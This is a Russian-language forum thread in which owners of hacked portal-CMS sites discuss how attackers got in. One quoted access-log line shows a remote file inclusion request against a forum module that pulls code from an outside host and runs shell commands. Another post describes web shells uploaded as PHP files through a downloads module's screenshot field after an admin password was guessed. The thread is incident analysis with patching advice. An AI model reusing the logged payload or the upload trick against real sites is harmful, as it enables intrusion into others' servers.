Ну вот и мой сайт отломали...

[LARK]

Цитата:

Сообщение от dervish Я тоже пострадал короче.

Давайте все таки сообщать - характер взлома, версия портала, список установленных модулей. Так быстрее устанавливать причину.

[dervish]

Привет!

Зашли через форум (newbb_plus 0.81), портал на 1.1 версии стоит. До 1.2 версии не апгрейдил.

А вот что было в логах:

Цитата:

******.net:202.162.196.1 - - [06/Nov/2005:01:13:18 -0500] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://216.111.31.2/cse.gif?&cmd=cd%20/usr/src/smartmontools-5.27;ls%20-alF;/sbin/ifconfig|grep%20inet;wget HTTP/1.0" 200 5941 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

[LARK]

Цитата:

Сообщение от dervish Зашли через форум (newbb_plus 0.81), портал на 1.1 версии стоит. До 1.2 версии не апгрейдил.

Цитата:

Сообщение от dervish Я патчил только форум.

Ну так заплатка стояла или нет? Эта дырка закрыта в патче

[dervish]

Нет, LARK, сейчас только доступ дал хостер к моему сайту. Я сразу же закрыл дырку. Но вопрос, а еше есть где-то другие файлы нужно менять? например здесь выше об аватарах речь идет, а где именно какой файл менят не написали.

[LARK]

Цитата:

Сообщение от dervish Но вопрос, а еше есть где-то другие файлы нужно менять? например здесь выше об аватарах речь идет, а где именно какой файл менят не написали.

Лучше до 1.2 обновить, там несколько дырок закрыто, и более менее нормальный фильтр от SQL инъекций стоит. Насчет аватаров, пока вообще не ясно - есть новая дырка или нет.

[TomBRaider]

взломали и мой сайт. насовали шеллов. версия портала 1.1а с кучей исправлений и паков. но дело не в том. вскрыли не через форум или конкретый модуль а через авторизацию портала. просмотр access_log дал возможность оперативно вынуть файлы. после того как я нашел хакера))) (в принципе наследил он много и особо не скрывался) выяснил что взлом был осуществлен через подбор пароля админа сайта. Шелл был залит через модуль mydownloads, у меня модифицированный стоит, но оказывается там можно в скриншоты добавить *.php
жду ответа наших гуру.
к сожалению взлом пароля и конкретный заход на сайт различаются по времени поэтому логов самого взлома у меня нет.
такая дырка в портальной системе практически ставит крест на коммерческом использовании этой cms, во всяком случае для меня.

[LaRok]

TomBRaider Значит не стоило выставлять простые пароли на админские входы. Используйте сложные пароли, ставте files, вводите запрет на группы для добавления скриншотов.

Цитата:

Сообщение от TomBRaider такая дырка в портальной системе практически ставит крест на коммерческом использовании этой cms, во всяком случае для меня.

Если говорить о бруте и человеческом факторе(простые пароли), то такая уязвимость есть в любой системе.

[TomBRaider]

Цитата:

Сообщение от LaRok ставте files, вводите запрет на группы для добавления скриншотов.

кстати об этом модуле. есть ли скрипт который бы перенес базу с mydownloads в files? а то у меня более 1000 файлов <<Всего файлов: 1238, Всего категорий: 28 Всего загрузок: 61109>>. и насколько он безопаснее чем модифицированный mydownloads? точнее есть ли разница принципиальная между ними в плане безопасности?

[Zormax]

Цитата:

Сообщение от TomBRaider есть ли разница принципиальная между ними в плане безопасности?

Нет.
Пароль желательно символом на 10, не меньше...

Цитата:

Сообщение от TomBRaider Шелл был залит через модуль mydownloads, у меня модифицированный стоит, но оказывается там можно в скриншоты добавить *.php

Значит не все патчи стояли.
В свое время была заплатка от этого. Прикрепляю файл, для версии 1.1А
Замени:
class\fileupload.php

Посмотри в прикрепленном файле строки 601-607, у тебя такое было?

Ну и напоследок, не стоит доверять посетителям и разрешать отправлять статьи, новости, файлы без модерации администратором или модератором, народу на свете много всякого хватает...

[pan]

Цитата:

такая дырка в портальной системе практически ставит крест на коммерческом использовании этой cms

ну если оставлять пароль типа 12345 то да
А так я поддерживаю Zormax модерировать нужно все, ведь это твой сайт